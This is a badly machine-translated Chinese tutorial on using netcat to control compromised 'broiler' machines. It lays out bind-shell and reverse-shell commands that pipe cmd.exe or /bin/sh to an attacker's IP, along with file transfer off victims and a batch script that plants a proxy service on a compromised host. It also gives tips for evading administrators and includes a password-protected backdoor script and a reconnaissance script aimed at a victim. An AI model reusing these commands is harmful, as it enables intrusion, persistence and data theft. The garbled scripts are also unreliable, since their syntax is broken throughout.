NC tutorial (transfer)

0. Write in front 1. Netcat 1.10 for NT Help Information 2. Netcat 1.10 Commonly used command format 3. Manage broiler, change the broiler setting 4. Download connection 5.

######################################################################################################################################################################################################################################################################################################## ############# 0. Written in front ########################### ##################################################################################################################################################################################################################### , Always think about how to automatically Telnet broiler, automatically execute the command. To manage your own broiler. Write a program yourself. It is not enough, so only looks at the help information of NC, although I only read a half understand, but with the help of Jinshan Word 2002, I still understand something. I have necessary to sum up. Anyway, mainly satisfied My own needs. Compare the Win2000 Microsoft Telnet.exe and Microsoft's TLNTSVR.EXE service, you can see it when you connect. 1. Nc.exe is a non-standard Telnet client program, 1.2 is also a PUTTY.EXE The client program provides four connection modes --Raw -Telnet-Rlogin -SSH.

######################################################################################################################################################################################################################################################################################################## ############# 1. Netcat 1.10 for NT Help information ####################### ######################################### 想 想Connect to somewhere: nc [-Options] hostname port [s] [ports] ... Bind port waiting connection: nc -l -p port [-Options] [hostname] [port] parameter: -e prog program heavy Direction, once connected, execute [danger !!] -g Gateway Source-Routing Hop Point [S], Up to 8 -g Num Source-Routing Pointer: 4, 8, 12, ... -H Help Information -i SECS delay interval -L listening mode, used for inbound connection -n specified IP addresses, can not use HostName -O File record 16-based transmission -P port local port number -R arbitrarily designated local and remote ports - S addr local source address -u udp mode -V Detailed output - use two -V to get more detailed content -w Secs timeout time -z Time-crred input / output, where the port number can be specified when used for scanning One or use LO-HI specified range.

######################################################################################################################################################################################################################################################################################################## ########################################################################################################################################################################################################################################################################### ########################################> "Sleeping does not wake up from the early morning of October 15". 3.1. Spectacle of ports: NC -VV IP PORTRIVER [192.168.0.198] 19190 (?) Open // Display whether to open Open3.2. Scanner NC -VV -W 5 ip port-port portnc -vv -z ip port- Port Port This scan will leave a lot of traces, and the system administrator will be careful 3.3. Back door Victim machine: // Victim machine nc -l -p port -e cmd.exe // Win2000nc -l -p port -e / bin / sh // UNIX, LinuxatTacker Machine: // The attacker's machine. NC ip -p port // Connect Victim_ip, then get a shell. 3.4. Reverse connection Attacker Machine: // General is SQL2.exe, remote overflow, webdavx3.exe attack .// or Wollf's reverse connection .nc -vv -l -p port Victim Machine: nc -e cmd.exe Attacker ip -p portnc -e / bin / sh attacker ip -p port or: attacker machine: nc -vv -l -p port1 / * is used to input * / nc -vv -l -p prot2 / * for display * / Victim machine_ip port1 | cmd.exe | nc attacker_ip port2nc attacker_ip port1 | / bin / sh | attacker_ip port2139 To add parameters - S (nc.exe -l -p 139 -d -e cmd.exe -s each other Machine IP) This will ensure that nc.exe takes precedence over NetBIOS.

3.5. Transfer file: 3.5.1 Attacker Machine <- Victim Machine // Back from broiler DC .nc -d -l -p port Path / file.txt / * Victim Machine * / Need Ctrl C Exit // brokens Requires the cmd.exe of the GUI interface (terminal login, it is better to install FTP is convenient). Otherwise, there is no way to enter CRL C.3.5.2 Attacker Machine -> Victim machine // Upload command file to broiler nc -vv -l -p port> path / file.txt / * Victim machine * / need Ctrl C exit NC-D Victim_ip port

★★★★★ I have to focus on the recommended thing is this .nc Victim_ip port a.cmd@echo s >> a.cmd@echo cd / d %% windir %% / system32 / >> A.cmd@net stop "SKSOCKSERVER" >> A.cmd@snake.exe -config port 11111 >> a.cmd@net start "sksockserver" >> a.cmd@exit >> a.cmd: auto @ for / fly "eol =; tokens = 1, 2" %% I in (% 1) do @ (nc.exe -vv -w 3 %% i 1234 > 80.txtgoto Start turned off the firewall after running this batch, listens to many probing U vulnerabilities, most of which are three sets - Nimda virus Scan yours. This will get broiler. Although the quality is not high. But it is also a cheap approach. Brochure characteristics: 1. Unicode Vulnerability 2. The Guest password is empty, and the Administrators group user 3. Other vulnerabilities are slowly cool. However, once again, it is not recommended and cannot undermine the domestic host, and the TFTP.exe will be renamed later. Then dry off the MMC.exe process with pskill, followed by anti-virus.

After doing a good job, deactivate the Guest account to deal with the fool scanner ################################################################################################################################################################################################################################################################### ##################################################################################################################################################################################################################################################################################################### ######################################################################################################################################################################################################################################################################################################## ########## 5.1 http://www.atstake.com/research/tools/network_utilities/toL: Netcat 1.10 For UNIX VERSION: 03.20.96 Platforms: * Nixtool: Netcat 1.1 for Win 95/98 / NT / 2000 Version: 02.08.98 Platforms: Runs on Win 95/98 / NT / 2000 5.2 http://www.xfocus.net/download.php?id=320 name: cryptcat_nt.zip updated: 2002-04 -05 Category: Network Tools Platform: WIN9X / NT / 2000 Size: 115.8K Submit: Maxilaw Introduction: Encrypted NC. 5.3 http://content.443.ch/pub/security/blackhat/pub/security/blackhat/neetworking/nc/ Foreign website 10.03.02 15:48 1305 cryptcat.txt10.03.02 15:48 245760 cryptcat_linux2.tar10.03.02 15:48 118533 Cryptcat_NT .zip #################################################################################################################################################################################################################################################################################################### ############### 6. Supplement ######################################################################################################################################################################################################################################################################## ########################################################################################################################################################################################################################################################################################################### Version usage (reproduced): -------------------------------------- NC Usage Tips BY QUACK http://www.xfocus.org Security Focus NC This little thing should be familiar, it has been used n years ... There are not many nonsense here, combined with some Script talk about it. skill.

(Script in the article comes from NC110.TGZ file package) 1. Basically use QUACK # nc -h [v1.10] want to connect to somewhere: nc [-Options] hostname port [s] [ports] ... Bind port waiting connection: nc -l -p port [-Options] [HostName] [port] parameter: -e prog program is redirected, once connected, execute [danger !!] - g Gateway Source-Routing Hop Point [S], UP TO 8-G Num Source-Routing Pointer: 4, 8, 12, ...- H Helps Information - I SECS Delayed Interval - L Listening Mode for Inbound Connections - N Specifies Digital IP address, can not use Hostname-o File Record 16 Encult Transmission -P Port Local Port number -R Arbitrary Specifies Local and Remote Port-S-S-S-S-S-S-S-S-S-S-S-S-S-UDP mode -V detailed output-use two -v can get more detailed content -w Secs Timeout time -z to turn off the input and output - when the port number can specify one or the specified range of LO-HI.

Second, used to transfer files - NCP #! / Bin / sh ## Similar to RCP, but use Netcat to do "NCP TargetFile" on the machine to receive files with NETCAT Make "NCP Sourcefile ReceivingHost" ## If "NZP" is called, the transfer file is compressed ## define the port you want to use, you can freely choose myport = 23456 ## If the NC is not in the system path, The following line comment removed, modified # path = $ {home}: $ {path} Export Path ## The following line check parameter input TEST "$ 3" && echo "Too Many Args && Exit 1test!" $ 1 "&& Echo "NO args?" && exit 1me = `Echo $ 0 | SED 'S . * / '` Test "$ me" = "NZP" && echo '[compressed mode] # i second arg, it's a host to Send An [extant] File to.if Test "$ 2" Tentest! -f "$ 1" && echo "can't" $ me "=" NZP "ThenCompress-C <" $ 1 "| NC -v -w 2 $ 2 $ MyPort && Exit 0ELSENC -V -W 2 $ 2 $ MyPort <"$ 1" && exit 0fiecho "Transfer failed!" exit 1fi # Is there a file IF Test -f article with the file machine current directory $ 1 "THENECHO -N" OVERWRIT $ 1? "Read Aatest!" $ Aa "=" y "&& echo" [PUNTED!] "&& exit 1fi # 30 Seconds OuGhta Be PleeeeEuty of Time, But change If you want.if test" $ ME "=" nzp "then # Note the use of NC usage, combined with redirection symbols and pipes NC -V -W 30 -P $ myport -l " $ 1 "&& EX It 0ELSENC -V -W 30 -P $ myport -l "$ 1" && exit 0fiecho "Transfer failed!" # Clean Up, Since Even if The Transfer failed, $ 1 IS already TRASHEDRM -F "$ 1" EXIT 1,

I only need to first quicka # ncp ../abdlistening on the A machine, then on another machine B. QUACKB # ncp abcd 192.168.0.2quackb [192.168.0.1] 23456 (?) A Open connection to [192.168.0.2] from quackb [192.168.0.1] 1027 # See, file transfer is completed. Third, it is first clear that if you compile NETCAT, if you compile Netcat, you can compile the commands such as make FreeBSD, this tool is unused - to define a gaPing_security_hole it will offer -e Options. #! / Bin / sh ## A binding shell with NC and has a password-protected script ## with a parameter, the port number nc = nccase "$ 1" in? *) Lpn = "$ 1" Export lpnsleep 1 # 注意 这里 这里 这里 法法, parameter -L is Lister, -e is performing redirection echo "-l -p $ lpn -e $ 0" $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1 & echo "Launched on Port $ LPN" EXIT 0 ;; ESAC # Here We Play inetdecho "-l -p $ lpn -e $ 0" $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1 & while read QQ Docase "$ qq" in # here is weak password protected, password is quackquack) CD / exec csh -i ;; esacdone To see how it is used? QUACK # ./bsh 6666 <------- Enter, behind is the program output - L -P 6666-E ./bshlaunched on port 6666QUACK # Quack ## nc localhost 6666 <-------- - Enter -l -p 6666 -E ./bshquack <---------- Enter, password verification warning: imported path contains relative componentswarning: no access to tty (bad file descriptor) .thus no job control in This Shell.cracker # four, used for port scan -Probe in some of our common port scanners, such as VeteScan is written with shell script, many of the system is Netcat, what is the reason? Take a look at the script below, you may understand some.

#! / Bin / sh ## Launch A Whole Buncha Shit at Yon Victim in No Particular; Capture ## stderr stdout in one place. Run as root for ketbervice and low -p to work. ## fairly thorough example Netcat to collect a lot of host info. ## Will Set Off Evey ALARM in Existence on a ParaNoid Machine! # There are some gadgets DDIR = .. / data # specify gateway Gate = 192.157.69.11 # might concebly wanna Change this for Different Run StyleSuCmd = 'NC -V -W 8'Test! "$ 1" && echo needs Victim Arg && exit 1echo' | $ ucmd -w 9 -r "$ 1" 13 79 6667 2> & 1echo '0' | $ UCMD "$ 1" 79 2> & 1 # if lsrr Was Passed thru, Should get refusal here: # Note the usage here, in fact, these parameters of NC can do a lot of things $ ucmd-z -r -g $ GATE "$ 1" 6473 2> & 1 $ ucmd -r -z "$ 1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2> & 1 # -s `hostname` May be wrong for some multihomed Machinecho 'Udp echoecho!' | Nc -u -p 7 -s `Hostname` -w 3" $ 1 "7 19 2> & 1echo '113, 10158" $ ucmd -p 10158 "$ 1" 113 2> & 1RService Bin Bin | $ UCMD -P 1019 "$ 1" shell 2> & 1echo quit | $ ucmd -w 8 -r "$ 1" 25 158 159 119 110 109 1109 142-144 220 23 2> & 1 # newlineAfter any telnet TRASHECHO '' Echo Pasv | $ ucmd -r "$ 1" 21 2> & 1echo 'get /' | $ ucmd -w 10 "$ 1" 80 81 210 70 2> & 1 # Sometimes Contains Useful Directory Info: # Know what file is Robots.txt? ;) Echo 'get / Robots.txt' | $ ucmd -w 10 "$ 1" 80 2> & 1 # now the big red lights Go ON # Try the tool Rservice, this tool can be in the NC110.TGZ Data directory Find RService Bin Bin 9600/9600 | $ UCMD -P 1020 "$ 1" Login 2> &